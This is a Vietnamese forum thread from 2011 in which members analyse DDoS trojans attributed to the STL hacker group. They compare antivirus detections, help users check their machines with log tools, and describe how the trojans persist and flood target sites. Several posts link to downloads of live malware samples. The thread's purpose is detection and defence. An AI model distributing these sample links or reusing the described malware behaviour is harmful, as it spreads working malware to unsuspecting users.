Malware] The following links contain more information regarding the detections listed above: http://go.microsoft.com/fwlink/?linkid=95666&Entry.aspx&name=Trojan:Win32/Vietak.A

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

xnohat wrote:

ptv_vbhp wrote:

PXMMRF wrote:

Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.

TQN wrote:

Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết!
Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây

Ý "Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây " của anh xnohat là sao ạ ? Nghĩa là quét virut khi máy bị virut của STL hay là , chỉ cần quét được file mà anh TQn up lên MF là đc ? - E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào - Em không quảng cáo hay làm gì đó BKis đâu nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

Ý Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây; của anh xnohat là sao ạ ? Nghĩa là quét virut khi máy bị virut của STL hay là , chỉ cần quét được file mà anh TQn up lên MF là đc ? - E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào - Em không quảng cáo hay làm gì đó BKis đâu nhé

Hình đâu ? , đáng tin cây hơn thì làm 1 clip đi P/s: sao lại có 2 nick ở đây nhỉ

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

Sax 2 nick là sao hả anh xno . Em là em không liên quan hay dính dáng gì tới ông viết bài ở trên đâu . À cho em hỏi luôn em quét thấy kis nó báo Infomation from KSN : moẻ than 10.000 users thí application .File became know more than a year ago => nghĩa là gì vậy mọi người

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

Avira free vẫn chưa nhận dạng Acrobatupdater.exe là virus. Mình đã gửi thêm cho Ad Aware hi vọng sẽ được cập nhật sớm. Có một điều mình thắc mắc là không hiểu sao tụi stl lại tấn công vietnamnet trong khi chúng có thể có nhiều cách dễ hơn nhiều để điều khiển nội dung trang tin này cơ mà ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

mv1098 wrote:

Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.

Nhưng mà mấy thằng hèn cũng được cái việc là diệt được khối zombies của Sờ Ti Lợn. thế cũng tạm được rồi .... đúng ra nó nên đặt tên theo anh PXMMRF nói.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

mv1098 wrote:

Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.

Mình thấy vậy là được rồi, chỉ sợ mấy anh ấy "câu nệ" không dám update thì mới là vấn đề. Còn mấy anh ấy chịu update thì coi như HVA mình giúp được người dùng bkav.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

mv1098 wrote:

Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.

bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

acoustics89 wrote:

mv1098 wrote:

Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.
bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =))

Mình chỉ tức là họ được tạo điều kiện và có rất nhiều thời gian mà họ không giúp đỡ nhiệt tình như cái vụ giúp anh Hàn Quốc chẳng hạn. trong khi đó con virus này nó ảnh hưởng tới cộng đồng người Việt nhiều như vậy. Mỗi người 1 suy nghĩ nên mình không tranh luận thêm về vấn đề này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

acoustics89 wrote:

mv1098 wrote:

Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.
bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =))

acoustic89 có vẻ hơi nhạy cảm rồi :D Tớ thấy bạn mv1098 nói cũng có ý đúng, nhưng phải thông cảm cho họ :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

maithangbs — GMT

mv1098 wrote:

Mình chỉ tức là họ được tạo điều kiện và có rất nhiều thời gian mà họ không giúp đỡ nhiệt tình như cái vụ giúp anh Hàn Quốc chẳng hạn. trong khi đó con virus này nó ảnh hưởng tới cộng đồng người Việt nhiều như vậy. Mỗi người 1 suy nghĩ nên mình không tranh luận thêm về vấn đề này.

Vấn đề PR thì cái nào hơn bạn? Thực ra BKIS cũng nên reg một cái nick chính thức, tham gia tích cực RCE ở chủ đề này, thì ít nhiều cũng được thiện cảm của anh em IT, nhất là những anh em hay sinh hoạt ở HVA. Kể cả khi bác TQN kêu khản cổ, các anh ấy vẫn im lặng. CMC thì chí ít còn có được bạn B***89.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

mv1098 wrote:

Mình chỉ tức là họ được tạo điều kiện và có rất nhiều thời gian mà họ không giúp đỡ nhiệt tình như cái vụ giúp anh Hàn Quốc chẳng hạn. trong khi đó con virus này nó ảnh hưởng tới cộng đồng người Việt nhiều như vậy. Mỗi người 1 suy nghĩ nên mình không tranh luận thêm về vấn đề này.

Theo mình thì HVA đã, đang và sẽ không bao giờ cần sự giúp đỡ nào từ Bkis. Diễn đàn HVAOnline cũng là nơi mà không thể dùng đồng tiền để quảng cáo cho các sản phẩm và dịch vụ của Bkav với sự "bảo kê" từ ban quản trị diễn đàn như các nơi khác, họ (Bkav) không cử người vào đây chính thức là hiển nhiên dù HVAOnline là một diễn đàn có sức ảnh hưởng rất lớn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Không nhất thiết họ phải tham gia vào diễn đàn, chỉ cần họ đưa ra những cảnh báo trên website của BKIS là đã mừng lắm rồi. "160.000 máy tính nhiễm virus mỗi ngày tại Việt Nam" đây là thông báo trên website của BKIS chỉ cần 1/10 số máy tính này bị dính malware của STL mỗi ngày thôi các bạn tính xem nó sẽ còn gây hại như thế nào. Tôi trước giờ không thích BKAV những cũng không phải vì thế mà không mong muốn BKIS phát triển. Đơn cử có anh bạn nhờ tôi mua key bản quyền của BKAV tôi không hề ngăn cản vẫn vui vẻ mua giùm, vì nghĩ rằng nó sẽ giúp cho BKIS phát triển cũng như nền CNTT của Việt Nam phát triển hơn. Mong 85% thị phẩn của BKIS tại Việt Nam đừng có giảm xuống.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Semperidem wrote:

http://www.mediafire.com/?fbffz39h68qm7wu Em xin lỗi vì hôm qua đưa không kịp thời. đây là goopdate.dll của em, em chưa zip ạ.:D

Cám ơn em. Đã download và đang phân tích.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Semperidem wrote:

http://www.mediafire.com/?fbffz39h68qm7wu Em xin lỗi vì hôm qua đưa không kịp thời. đây là goopdate.dll của em, em chưa zip ạ.:D

File này là của Google, không phải virus STL.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

ivanst wrote:

...................................... - E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào - Em không quảng cáo hay làm gì đó BKis đâu nhé

Anh TQN mới đây đã RCE và uplpad lên mang 2 file virus của STL: - AcrobatUpdater_15_08_2011 - AcrobatUpdater_20_08_2011 Tôi đã thử nghiệm trên thưc tế file (process) AcrobatUpdater.exe lấy từ AcrobatUpdater_20_08_2011 sau khi unzipped. Đây là một DDoS tool (virus) của STL đang tiến hành DDoS vào HVA. Tôi đã thông báo kết quả thử nghiệm chi tiết trong topic này. Khi tôi thử thì Avira không detect đươc AcrobatUpdater.exe này là virus-trojan. Còn hôm nay thì Avira đã detect đươc, cụ thể như sau Avira updated 24-8-2011 phát hiện - AcrobatUpdater.exe (20-8) là Trojan TR/VB.AGS.3 - images01.gif (20-8- file đi kèm AcrobatUpdater.exe) cũng là TR/VB.AGS.3 - AcrobatUpdater.exe (15-8) là Trojan TR/VB.alf.2 - images01.gif (15-8- file đi kèm AcrobatUpdater.exe) cũng là TR/VB.alf.2 Kaspersky antivirus updated 23-8-2011 (hôm qua) thì không phát hiện ra virus trong tất cả 4 file nói trên. McAfee version 8.8 Enterprise cũng vậy, như KAS. Tôi đã hoàn tất kết quả thử nghiệm một DDoS tool mới của STL là SbieSvc.exe (đi kèm với SbieMgm.dll) và dự kiến đặt tên nó là TRJ/hvadetec-2. Có những điểm thú vị, các bạn đón đọc

Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem — GMT

- Cảm ơn anh Conmale. :D - Anh Bolzano_1989 coi luôn giùm em file googlecrashhandler.exe luôn nha anh. Link đây ạ: http://www.mediafire.com/file/ql94xm0w3fs9gmg/GoogleCrashHandler.exe - Hôm nay em thấy file này mới xuất hiện: GoogleCrashHandler.exe-0BB7A0D9.pf , em không biết có liên quan gì không nên up lên luôn, đây là link: http://www.mediafire.com/file/kndjsmdp8pf6ok2/GOOGLECRASHHANDLER.EXE-0BB7A0D9.pf - Đây là file goopdate.dll em đưa link lên lại: http://www.mediafire.com/file/fbffz39h68qm7wu/goopdate.dll Cảm ơn mọi người.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

Hôm nay sáng dạy, phải vào đọc mấy trang tin tức 1 cái. Chả lẽ lại lên vnexpress.net đọc mấy cái truyện cười, hay lên 24h.com.vn đọc mấy cái truyện tình dục :( thế là thôi ta lớn rồi phải đọc thông tin tình hình đất nước :*- vô ngay danlambaovn Code:

Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?


IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html

giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy.

Bật thử task manager lên thì thấy.

em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/ Lưu ý: Mình chỉ nhận xem các file log cho các máy tính có triệu chứng nhiễm virus của STL rõ ràng. Các bạn có thể dùng tắt tất cả các trình duyệt web trên máy, sau đó TCPView, SmartSniff hay các chương trình tương tự để xác định máy tính của bạn có kết nối tự động đến một trong các website sau hay không:

1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com 10. http://vietnamnet.vn 11.

Nếu có thì bạn vui lòng ghi rõ website nào mà máy tính của bạn đang tự động kết nối đến vì mình chỉ kiểm tra cho các máy nào có dấu hiệu nhiễm virus của STL.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Semperidem wrote:

- Cảm ơn anh Conmale. :D - Anh Bolzano_1989 coi luôn giùm em file googlecrashhandler.exe luôn nha anh. Link đây ạ: http://www.mediafire.com/file/ql94xm0w3fs9gmg/GoogleCrashHandler.exe - Hôm nay em thấy file này mới xuất hiện: GoogleCrashHandler.exe-0BB7A0D9.pf , em không biết có liên quan gì không nên up lên luôn, đây là link: http://www.mediafire.com/file/kndjsmdp8pf6ok2/GOOGLECRASHHANDLER.EXE-0BB7A0D9.pf - Đây là file goopdate.dll em đưa link lên lại: http://www.mediafire.com/file/fbffz39h68qm7wu/goopdate.dll Cảm ơn mọi người.

Đấy đều là các file lành cả, không phải virus STL đâu :) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

phanledaivuong wrote:

Hôm nay sáng dạy, phải vào đọc mấy trang tin tức 1 cái. Chả lẽ lại lên vnexpress.net đọc mấy cái truyện cười, hay lên 24h.com.vn đọc mấy cái truyện tình dục :( thế là thôi ta lớn rồi phải đọc thông tin tình hình đất nước :*- vô ngay danlambaovn Code:
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?


IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html
giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy. .................................................... Bật thử task manager lên thì thấy. ....................................... em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome.

Máy em chắc chắn là nhiễm Virus-DDos tool của STL, loai TRJ/hvadetec-2, hay variant của nó. Nhìn tên các máy mục tiêu (vietan.org) và những lỗi xảy ra trong quá trình kết nối-tấn công DDoS là thấy rõ vài vấn đề. Tôi sẽ phân tích kỹ trong bản báo cáo thử nghiệm sắp tới. Các DDoS tool của STL thường là các Hiden process nên trên Task manager của Windows có thể không thấy. Ngoài ra việc tìm ra các folder-file lạ trong hệ thống cũng không dễ. Vì máy ta thường cài rất nhiều application và các DDoS tool-virus STL luôn mạo tên hoặc dùng tên file "thấy quen quen thế nào ấy". Hì hì

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

phanledaivuong wrote:

Hôm nay sáng dạy, phải vào đọc mấy trang tin tức 1 cái. Chả lẽ lại lên vnexpress.net đọc mấy cái truyện cười, hay lên 24h.com.vn đọc mấy cái truyện tình dục :( thế là thôi ta lớn rồi phải đọc thông tin tình hình đất nước :*- vô ngay danlambaovn Code:
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?


IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html
giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy. Bật thử task manager lên thì thấy. em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome.

Em khoan động đậy gì cái máy nha. Chắc chắn máy em bị nhiễm rồi. Cứ làm theo hướng dẫn mà bolzabo_1989 đưa ra và gởi thông tin lên đây.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

bolzano_1989 wrote:

Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/

Đây là file log em đã scan như anh hướng dẫn. Code:

http://www.mediafire.com/?h5pm1q12r1h2ycm

Hiện tại em đang ở trường, nên trước khi scan log với TCPView em có kiểm tra lại với Wireshark thì không thấy máy mình kết nối tới viettan.org nữa, mặc dù từ lúc scan log wireshark kia xong em tắt máy tính và đến trường luôn, không động chạm gì đến hệ thống. Nếu cần scan lại log TCPView khác thì khi về nhà em sẽ scan lại với TCPView rồi gửi log lên sau

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

phanledaivuong wrote:

bolzano_1989 wrote:

Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/
Đây là file log em đã scan như anh hướng dẫn. Code:
http://www.mediafire.com/?h5pm1q12r1h2ycm
Hiện tại em đang ở trường, nên trước khi scan log với TCPView em có kiểm tra lại với Wireshark thì không thấy máy mình kết nối tới viettan.org nữa, mặc dù từ lúc scan log wireshark kia xong em tắt máy tính và đến trường luôn, không động chạm gì đến hệ thống. Nếu cần scan lại log TCPView khác thì khi về nhà em sẽ scan lại với TCPView rồi gửi log lên sau

Không thấy gì đáng ngờ. Chỉ có cái unikeyNT kia không biết có phải là đồ xịn không. Tí nữa về, thử chạy lại TCPView coi thử nhe em? Nếu có bất cứ kết nối nào ra ngoài cũng chộp hết (và nhớ đừng khởi động bất cứ trình duyệt nào hết).

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Nhiều khả năng là nó đây rồi: c:\program files\kaspersky lab\kaspersky password manager\de_stpass_.exe Bạn gửi file này gấp cho mình qua địa chỉ email sau:

CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể sau khi xác nhận đây là virus. Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn. @anh conmale: File Unikeynt kia là file gốc của Unikey, chúng ta không cần phải lo.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

bolzano_1989 wrote:

Nhiều khả năng là nó đây rồi: c:\program files\kaspersky lab\kaspersky password manager\de_stpass_.exe Bạn gửi file này gấp cho mình qua địa chỉ email sau:

CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể sau khi xác nhận đây là virus. Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn. @anh conmale: File Unikeynt kia là file gốc của Unikey, chúng ta không cần phải lo.

đây là bản crack Kaspersky Password Manager Premium của thằng bạn em chính tay nó Crack. nó đưa cho em dùng. không biết nó có gửi "hàng" vào máy em không :| Code:

http://www.mediafire.com/?3fh3xpfejqcbusx

em đã send email cho anh file này. EDIT tránh spam

conmale wrote:

Không thấy gì đáng ngờ. Chỉ có cái unikeyNT kia không biết có phải là đồ xịn không. Tí nữa về, thử chạy lại TCPView coi thử nhe em? Nếu có bất cứ kết nối nào ra ngoài cũng chộp hết (và nhớ đừng khởi động bất cứ trình duyệt nào hết).

Vào sáng nay tự dưng thấy FF bị treo nên mới tắt đi scan thử bằng Wireshark và thấy có viettan.org nên em mới thấy lạ, vì em chưa vào site này bao giờ. mấy trang thông tin tự do em vào chỉ có danlambaovn.blogspot.com và X-cafevn.org (trang này là nhờ Sờ Ti Lợn hack rồi đi rêu rao nên em mới biết đề vào đọc bài, X-cà có khi phải cám ơn STL đã PR giúp). Chiều nay vừa về nhà bật máy tính lên, tắt hết firefox. yahoo, tắt luôn cả cái protect của avast rồi em dùng wireshark để capture network lại thì không thấy cái viettan.org nào nữa :( Code:

http://www.mediafire.com/?7bb0oxqxfhroi89

Đây là log TCPView khi em scan tại nhà Code:

http://www.mediafire.com/?22c34bgzj7vnt31

Nếu như máy em không bị virus mà vì lý do nào đó mà tự nhiên sáng nay capture bằng wireshark lại lòi ra mấy cái packet NBNS đến viettan.org mà làm mất thời gian của nhiều anh em trên hva thì em xin lỗi :D hì hì. Thông tin mới nhất: Đang post bài này lên, tự dưng làm trái ý anh conmale để Firefox và bật 4 tab:

rồi em bật Wireshark thì túm được 1 đống packet send tới viettan.org, may là có cái log này, không lại mang tiếng là đồng bọn của STL cố tình gây mất thời gian của anh em HVA thì chết. FF của em rất hay bị đơ, sử dụng khoảng 1 -> 2 phút thậm chí có thể ngắn hơn là bị not responding liên tục. chắc là do cái này ... Log wireshark: Code:

http://www.mediafire.com/?ykv5h6di1kmv50m

Log mới với Autotuns, Autorunsc và TCPView cho anh bolzano_1989: Code:

http://www.mediafire.com/?zm5serhuk3bwfxe

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Bạn đừng gửi log Autoruns ở máy tính của bạn nữa, mà gửi 2 log sau cho mình OTL và OTS, bạn hãy bật tất cả những gì mà bạn vừa sử dụng khi nãy, tái lập lại hiện tượng kết nối đến các website lạ kia rồi scan và gửi log: Hướng dẫn scan và gửi log OTL http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-otl/ Hướng dẫn scan và gửi log OTS http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-ots/ Mình tin là máy tính của bạn không bị nhiễm virus của nhóm STL ;) . Mình thấy có một khả năng lớn là có máy tính khác trong cùng mạng nội bộ của bạn bị nhiễm virus STL hoặc là một số người trong cùng mạng của bạn đang vào website viettan.org . Tốt nhất là bạn scan và gửi log Autoruns và Autorunsc ở tất cả các máy đang chạy trong cùng mạng khi xảy ra hiện tượng này cho mình, nhớ đánh số để phân biệt các log cùng máy tính đi kèm và việc truy tìm mẫu virus thuận tiện cho bạn :) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Như đã thấy, chúng ta đã thử nghiệm thưc tế, phân tích 2 DDoS tool của STL. Hôm nay tôi xin thông báo kết quả thử nghiệm thưc tế và phân tích DDoS tool thứ 3 của mạng STL bot. Có thể tạm goi đây là các DDoS tool điển hình (typical) của STL. DDoS tool thứ nhất là MSHelpCenter.exe. File (process) này (cùng với một số file khác) đươc tạo lập từ một file Unikey (bị cài lén virus), khi người dùng cài nó vào máy. File Unikey có virus được download từ trên mạng. Tuy nhiên sau khi đươc tạo lập, file MSHelpCenter.exe này thưc tế không tạo ra được các kết nối- tấn công DDoS vào các máy mục tiêu. Hiện tượng này có lẽ xuất phát từ việc file có những lỗi (bug) sau khi được STL soạn thảo hay cải tiến từ một file khác. DDoS tool thứ hai của STL là AcrobatUpdater.exe. File (process) này đươc giấu (embedded) trong một file ảnh, download về từ một webserver do STL quản lý. File nào của STL đã được cài sẵn trong máy, đóng vai trò một Trojan-downloader để download file ảnh nói trên về máy nạn nhân, thì còn cần được kiểm tra thêm. Khi được cài vào máy, file AcrobatUpdater.exe tạo lập một đường dẫn riêng trong thư mục C/WINDOWS/Program Files/ (trong Win XP và Win 2K3...), cũng như tự copy mình vào thư mục "Startup" để khởi động cùng với Windows khi nó start (boot) hay restart và tạo lập các (2) registry liên quan. Ngay khi được cài vào máy hay ngay sau khi Windows restart, AcrobatUpdater.exe khởi phát ngay quá trình tấn công DDoS vào các webserver của HVA với nhịp độ tấn công khá nhanh và khá mạnh, khoảng từ 4-10 packets (SYN type-62Bytes)/giây. Trong quá trình DDoS thì STL bot cũng kết nối đến master webserver của STL, download về máy nạn nhân một file ảnh, để update DDoS tool. DDoS tool này được HVA đặt tên là TRJ/hvadetec-1. DDoS tool AcrobatUpdater.exe này dường như STL soạn thảo để "ưu tiên" tấn công DDoS vào một mục tiêu duy nhất là HVA, chỉ riêng HVA mà thôi. TRong khi thì DDoS tool thứ ba của STL là SbieSvc.exe thì lai được bố trí để DDoS vào nhiều mục tiêu trong cùng một lúc (thí dụ danlambao, viettan....). Chúng tôi DDoS tool này của STL là TRJ/hvadetec-2. Như vậy ít nhất là còn một DDoS tool điển hình nữa của STL đã và đang tấn công vào trang mạng vietnamnet.vn. Như trường hợp HVA, có lẽ DDoS tool này cũng được bố trí để chỉ "ưu tiên" tấn công vào vietnamnet.vn, chỉ mình vietnamnet.vn mà thôi. Khi có kết quả thử nghiệm thưc tế DDoS tool này chúng tôi sẽ đặt tên cho nó là TRJ/hvadetec-3. Dĩ nhiên là STL có thể điều khiển các DDoS tool thay đổi muc tiêu. Nhưng tình hình những tháng vừa qua là được STL bố trí, dàn xếp như vậy Mô tả quá trình gây nhiễm, kích hoạt của DDoS tool SbieSvc.exe (TRJ/hvadetec-3) và các đăc điểm của nó như sau: 1- (còn tiếp)

Phân tích tính chất vài trận DDoS HVA vừa qua.

hailua_online — GMT

bolzano_1989 wrote:

Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/

Đây là 3 file lần lượt theo thứ tự trên kiểm tra giùm em với có bị nhiễm virut ko thanks. http://www.mediafire.com/?9qb9w359wqaoco6 http://www.mediafire.com/?q0zfn30rcnehias http://www.mediafire.com/?cqqul3dk23blwrw

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

hailua_online wrote:

bolzano_1989 wrote:

